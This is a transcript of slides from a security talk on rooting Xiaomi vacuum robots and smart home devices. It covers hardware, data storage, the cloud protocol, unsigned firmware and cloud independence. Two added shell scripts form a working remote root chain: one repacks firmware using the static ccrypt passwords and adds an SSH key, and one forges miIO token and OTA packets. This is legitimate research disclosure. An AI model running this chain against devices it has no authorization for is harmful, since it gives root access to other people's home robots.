Reversing IoT: Xiaomi Ecosystem
Gain cloud independence and additional functionality by firmware modification (CC BY-NC-SA 4.0)

Outline: Introduction; Xiaomi Cloud; Devices and Rooting; Vacuum Cleaning Robot; Smart Home

(Transcript of slides 38 to 100 of the deck.)


  1. Backside layout of the mainboard (annotated photo): LIDAR UART; R16 UART (115200 baud, Tx/Rx); STM UART (921600 baud, Tx/Rx)
     ReCon BRX 2018 – Dennis Giese, Daniel Wegemer

  2. Frontside layout of the mainboard (GEN2): R16 SoC, 512 MB RAM, STM32 MCU, 4 GB eMMC flash, WiFi module

  3. Rooting: the usual (possibly destructive) way to retrieve the firmware

  5. Rooting: our weapon of choice

  6. Pin Layout (ball map of the CPU, rows A to U by columns 1 to 17, shown as a table on the slide). Signal groups in the map: MMC2 and MMC1 (D0 to D7, CLK, CMD, MMC Reset), UART0, UART1 and UART2 (TX, RX), TWI1 (SDA, SCL), RSB0 (SDA, SCK), RESET, Recovery, Confirm, Line In L/R, Phone In, MIC1/MIC2, USB1 (DM0, DP0) and USB2 (DM1, DP1), USB-DRV, LCD0 to LCD9, DRAM, VCC/VDD, GND. The MMC data lines are the ones shorted in the rooting trick that follows.

  7. Rooting, initial idea:
     - Short the MMC data lines so the boot ROM fails to load from eMMC
     - The SoC then falls back to FEL mode (USB boot)
     - Load and execute a tool in RAM via the USB connector
     - Dump the MMC flash, modify the image, rewrite the image to flash

  8. Software
     - Ubuntu 14.04.3 LTS (kernel 3.4.xxx), mostly untouched, patched on a regular basis
     - Player 3.10-svn: open-source cross-platform robot device interface and server
     - Proprietary software (/opt/rockrobo): AppProxy, RoboController, Miio_client, custom adbd version
     - iptables firewall enabled: blocks port 22 (sshd) and port 6665 (player)

  9. Available data on device
     - Data: logfiles (syslogs, duration, area, SSID, password), packet captures ("/usr/sbin/tcpdump -i any -s 0 -c 2000 -w"), maps; multiple MBytes per day
     - Data is uploaded to the cloud
     - Factory reset restores the recovery copy to system but does not delete data: maps and logs still exist afterwards

  10. Available data on device: maps, created by player, 1024 px × 1024 px with 1 px = 5 cm, so one map covers 51.2 m × 51.2 m

  11. Available data on device: example map, Northeastern University, ISEC Building, 6th floor

  12. Communication relations (architecture diagram)
      - Robot-internal IPC, plain JSON over TCP: compass, uart_lds and uart_mcu feed player (listening on 0.0.0.0:6665); RoboController (and AppProxy) exchange commands and reports with Miio_client over (local):54322 (tcp); wifimgr is a further local daemon
      - Robot to Xiaomi cloud, enc(key) JSON over tcp/udp: Miio_client talks to ot.io.mi.com:80 (tcp) and ott.io.mi.com:8053 (udp), commands in and reports out, AES encrypted; *.fds.api.xiaomi.com (https) delivers sound packages and firmware and receives maps and logs
      - App to robot, enc(token) JSON over UDP: the Android/iPhone app talks to AppProxy on 0.0.0.0:54321 (udp)

  13. eMMC Layout
      Label        Content                                         Size (MByte)
      boot-res     bitmaps & some wav files                        8
      env          u-boot cmd line                                 16
      app          device.conf (DID, key, MAC), adb.conf, vinda    16
      recovery     fallback copy of OS                             512
      system_a     copy of OS (active by default)                  512
      system_b     copy of OS (passive by default)                 512
      Download     temporary unpacked OS update                    528
      reserve      config + calibration files, blackbox.db         16
      UDISK/Data   logs, maps, pcap files                          ~1900

  15. Update process

  16. Update process: the miIO.ota command
      {"mode":"normal","install":"1","app_url":"https://[URL]/v11_[version].pkg","file_md5":"[md5]","proc":"dnld install"}

  17. Update process (system_a is the active copy, system_b the passive copy; the Download and Data partitions are also involved)
      1. The robot receives the miIO.ota command
      2. Download [app_url] into the Download partition
      3. MD5 ok? (compared against file_md5)
      4. Decrypt + image OK?
      5. Unpack + dd the image into the passive copy (system_b)
      6. Update root pw in /etc/shadow of the new copy
      7. Reboot: system_b becomes the active copy, system_a the passive one
      8. dd the new image over system_a as well, so both copies match

  30. Firmware updates
      - Full and partial images: encrypted tar.gz archives; a full image contains disk.img, a 512 MByte ext4 filesystem
      - Encryption: ccrypt with the static password "rockrobo"; sound packages use the static password "r0ckrobo#23456"
        (ccrypt is Rijndael with a 256-bit key and a 256-bit block, i.e. the AES cipher family, but not the 128-bit-block AES standard)
      - Integrity: an MD5 provided by the cloud, no signature; anyone who knows the static password can build an image the robot accepts, which is exactly what the remote rooting below does
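The decrypt, patch and repack cycle these slides describe (and the preparation step of "Let's root remotely" further down), as an added example that is not code from the talk or from the authors' Dustcloud project. Facts from the slides: ccrypt with the static password "rockrobo", a tar.gz containing disk.img, and an MD5 as the only integrity check. Assumptions: the file names, that the host has ccrypt, GNU coreutils/sed and root for the loop mount, and that the iptables rule for port 22 is a plain "--dport 22" line in a script or config file under /etc or /opt of the image (its real location is not on the slides).

```shell
#!/bin/sh
# Added example, not code from the talk or from Dustcloud: rebuild a vacuum
# firmware package so that it carries our SSH key and no longer blocks sshd.
# From the slides: ccrypt stream, static password "rockrobo", tar.gz with
# disk.img (512 MB ext4), integrity = the MD5 named in the miIO.ota command.
# Assumptions (marked where used): file names, location of the iptables rule,
# ccrypt + GNU coreutils/sed on the host, root for the loop mount.
set -eu

CCRYPT_PASS=rockrobo            # static password from slide 30

# Integrity check exactly as the robot does it: MD5 of $1 compared with $2.
check_md5() {
    [ "$(md5sum "$1" | cut -d' ' -f1)" = "$2" ]
}

# ccrypt acts as a filter when no file name is given: .pkg <-> .tar.gz
decrypt_pkg() { ccrypt -d -K "$CCRYPT_PASS" < "$1" > "$2"; }   # $1=in.pkg    $2=out.tar.gz
encrypt_pkg() { ccrypt -e -K "$CCRYPT_PASS" < "$1" > "$2"; }   # $1=in.tar.gz $2=out.pkg

# Patch the mounted root filesystem: authorized_keys for root, and drop every
# line that blocks port 22 (assumption: a "--dport 22" line under /etc or /opt).
patch_rootfs() {                # $1=mountpoint $2=public key file
    install -d -m 700 "$1/root/.ssh"
    cat "$2" >> "$1/root/.ssh/authorized_keys"
    chmod 600 "$1/root/.ssh/authorized_keys"
    grep -rl -e '--dport 22' "$1/etc" "$1/opt" 2>/dev/null |
        while read -r f; do sed -i '/--dport 22/d' "$f"; done
}

# The miIO.ota command body from slide 16, filled in for our package.
ota_command() {                 # $1=app_url $2=md5 ; prints the JSON on stdout
    printf '{"mode":"normal","install":"1","app_url":"%s","file_md5":"%s","proc":"dnld install"}\n' "$1" "$2"
}

# Full procedure. Usage (file names and URL are examples):
#   sh rebuild.sh v11_orig.pkg ~/.ssh/id_ed25519.pub http://10.0.0.5:8080/v11_mod.pkg
main() {
    orig=$1; pubkey=$2; url=$3
    work=$(mktemp -d)
    decrypt_pkg "$orig" "$work/fw.tar.gz"
    mkdir "$work/fw" "$work/mnt"
    tar -xzf "$work/fw.tar.gz" -C "$work/fw"          # contains disk.img
    mount -o loop "$work/fw/disk.img" "$work/mnt"
    patch_rootfs "$work/mnt" "$pubkey"
    umount "$work/mnt"
    tar -czf "$work/fw_mod.tar.gz" -C "$work/fw" .     # repack whatever the archive held
    encrypt_pkg "$work/fw_mod.tar.gz" v11_mod.pkg
    # This goes into the miIO.ota command; the robot checks nothing but this MD5.
    ota_command "$url" "$(md5sum v11_mod.pkg | cut -d' ' -f1)"
}

if [ $# -eq 3 ]; then main "$@"; fi
```

Because the only check before flashing is the MD5 that the sender of the miIO.ota command supplies, a package rebuilt this way installs exactly like an official one; serve v11_mod.pkg from any HTTP server the robot can reach and put the printed JSON into the command.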


  33. Let's root remotely
      - Preparation: rebuild the firmware; include authorized_keys; remove the iptables rule for sshd
      - Send the "miIO.ota" command to the vacuum, encrypted with the token, from the app or in unprovisioned state, with app_url pointing to our own HTTP server

  34. Let's root remotely, sequence (animated diagram with the robot, our webserver and our client)
      1. The robot is in unprovisioned state
      2. "Get Token" from the robot
      3. Send "miIO.ota" to the robot, app_url pointing at our webserver
      4. The robot fetches the rebuilt firmware from the webserver and installs it
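The "Get Token" and "miIO.ota" exchange above, as an added example that is not code from the talk. The miIO framing and key schedule used here (16-byte header with magic 0x2131, 16-byte MD5 checksum over header, token and ciphertext, payload AES-128-CBC with key = md5(token) and iv = md5(key || token)) are the protocol as implemented by the open-source python-miio client, not something stated on the slides; the token, device id, stamp and URL are constructed sample values, and the netcat delivery line assumes an OpenBSD-style nc. The script needs md5sum, od and openssl.

```shell
#!/bin/sh
# Added example, not code from the talk: build the two miIO datagrams behind the
# remote rooting sequence, the "hello" that makes an unprovisioned robot hand out
# its token, and the token-encrypted miIO.ota command. Framing and key schedule
# follow python-miio, not the slides: header = 0x2131, total length, 4 zero
# bytes, device id, stamp; checksum = md5(header || token || ciphertext);
# payload = AES-128-CBC/PKCS#7, key = md5(token), iv = md5(key || token).
set -eu

# hex <-> raw bytes in plain POSIX sh (no xxd): hex2bin prints bytes, bin2hex reads stdin
hex2bin() {
    h=$1
    while [ -n "$h" ]; do
        printf "\\$(printf '%03o' "$((0x${h%"${h#??}"}))")"
        h=${h#??}
    done
}
bin2hex() { od -An -v -tx1 | tr -d ' \n'; }
md5hex()  { md5sum | cut -d' ' -f1; }          # md5 of stdin as 32 hex chars

# $1 = payload length in bytes, $2 = device id (8 hex chars), $3 = stamp (8 hex chars)
miio_header() { printf '2131%04x00000000%s%s' "$((32 + $1))" "$2" "$3"; }

# Discovery / "Get Token" datagram: length 32, everything after magic+length 0xff.
# An unprovisioned robot answers with its token in the checksum field (bytes 16..31).
miio_hello() {
    h=21310020; i=0
    while [ "$i" -lt 28 ]; do h=${h}ff; i=$((i + 1)); done
    printf '%s' "$h"
}

miio_key() { hex2bin "$1" | md5hex; }                       # key = md5(token)
miio_iv()  { hex2bin "$(miio_key "$1")$1" | md5hex; }       # iv  = md5(key || token)

# $1 = token (32 hex chars), $2 = device id, $3 = stamp, $4 = JSON; prints the packet as hex
miio_encrypt() {
    tok=$1; key=$(miio_key "$tok"); iv=$(miio_iv "$tok")
    ct=$(printf '%s' "$4" | openssl enc -aes-128-cbc -K "$key" -iv "$iv" | bin2hex)
    hdr=$(miio_header "$(( ${#ct} / 2 ))" "$2" "$3")
    sum=$(hex2bin "$hdr$tok$ct" | md5hex)
    printf '%s%s%s' "$hdr" "$sum" "$ct"
}

# Constructed sample values: a token as it would come back in the hello reply,
# the device id and stamp from the same reply, and the miIO.ota body from
# slide 16 wrapped in the usual miIO request envelope (id/method/params).
TOKEN=00112233445566778899aabbccddeeff
DEVID=0001e240
STAMP=00000bb8
OTA='{"id":1,"method":"miIO.ota","params":{"mode":"normal","install":"1","app_url":"http://10.0.0.5:8080/v11_mod.pkg","file_md5":"d41d8cd98f00b204e9800998ecf8427e","proc":"dnld install"}}'

if command -v openssl >/dev/null 2>&1; then
    printf 'hello: %s\n' "$(miio_hello)"
    printf 'ota:   %s\n' "$(miio_encrypt "$TOKEN" "$DEVID" "$STAMP" "$OTA")"
    # Delivery to the robot on UDP 54321 (AppProxy), e.g. with OpenBSD netcat (assumption):
    #   miio_hello | hex2bin | nc -u -w 1 "$ROBOT_IP" 54321 | bin2hex   # token = last 32 hex chars
    #   miio_encrypt "$TOKEN" "$DEVID" "$STAMP" "$OTA" | hex2bin | nc -u -w 1 "$ROBOT_IP" 54321
fi
```

In unprovisioned state the hello reply carries the token in the clear; once the robot is provisioned the same token has to come from the app (slide 33), and the device id and stamp in the header should be copied from the robot's reply, which is what python-miio does as well. Everything that authenticates the miIO.ota command is therefore knowledge of the token.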

  40. SSH


  46. Gain independence from the Xiaomi cloud. Two methods: replacing the cloud interface; proxying the cloud communication

  47. Replacing the cloud interface (diagram built up over four slides)
      - Starting point: the communication relations above, Miio_client talking to ot.io.mi.com:80 (tcp) and ott.io.mi.com:8053 (udp), AppProxy talking to the Android/iPhone app on 0.0.0.0:54321 (udp)
      - Remove Miio_client and with it the Xiaomi cloud connection; the robot-internal IPC (compass, uart_lds, uart_mcu, player on 0.0.0.0:6665, wifimgr, RoboController, AppProxy; plain JSON over TCP) keeps working
      - Put "my cloud client" on the local interface (local):54322 (tcp) in place of Miio_client; it speaks https, mqtt, etc. to FHEM, Home Assistant or whatever home automation you run
      - Point the remaining cloud hosts at localhost in /etc/hosts on the robot (127.0.0.1 awsbj0..., 127.0.0.1 aswbj0-files..., 127.0.0.1 cdn.cnbj0....) so that the uploads to *.fds.api.xiaomi.com (https) go nowhere

  51. Proxy cloud communication
      - Keep the stock stack from the communication relations above: Miio_client talking enc(key) JSON to ot.io.mi.com:80 (tcp) and ott.io.mi.com:8053 (udp), AppProxy talking enc(token) JSON to the Android/iPhone app on 0.0.0.0:54321 (udp)
      - Redirect the cloud endpoint in /etc/hosts on the robot to a host you control that runs Dustcloud: 130.83.x.x ot.io.mi.com
      - Dustcloud then takes the place of the Xiaomi cloud for the robot; every endpoint Miio_client uses needs such an entry, otherwise that traffic still reaches Xiaomi

  54. Summary of the vacuum
      - Rooting: remote!
      - Cloud connection: run without cloud, or run with your own cloud
      - Our goal: we want the cloud keys!

  55. SMART HOME GATEWAY, LIGHTBULBS AND LED STRIPS

  56. Xiaomi Ecosystem: ZigBee devices talk to the gateway, the gateway talks HTTPS to the Xiaomi cloud

  58. Overview hardware
      - Application MCU: Marvell 88MW30x: ARM Cortex-M4F @ 200 MHz; 512 KByte SRAM; QSPI interface, supports XIP; flash 16 MByte (gateway), 4 MByte SPI (LED strip, lightbulb); integrated 802.11b/g/n WiFi core
      - Zigbee MCU: NXP JN5169 (gateway only): 32-bit RISC CPU; 32 kB RAM; 512 kB embedded flash, 4 kB EEPROM

  59. Sensors connected via the gateway (Zigbee, NXP JN5169 based): door sensor (reed contact), temperature sensor, power plug, motion sensor, button, smoke detector, smart door lock, ...

  60. Acquiring the key
      - The PCB has lots of test points
      - SWD is enabled by default; labelled pads: SDCLK, SDIO, RST, TX*, GND, RX* (*UART)
      - We can get the key from the memory dump

  61. Acquiring the key
      - Can we get the key without a hardware attack?
      - Firmware updates are not signed ...
      - Let's create a modified firmware which gives us the key automatically!
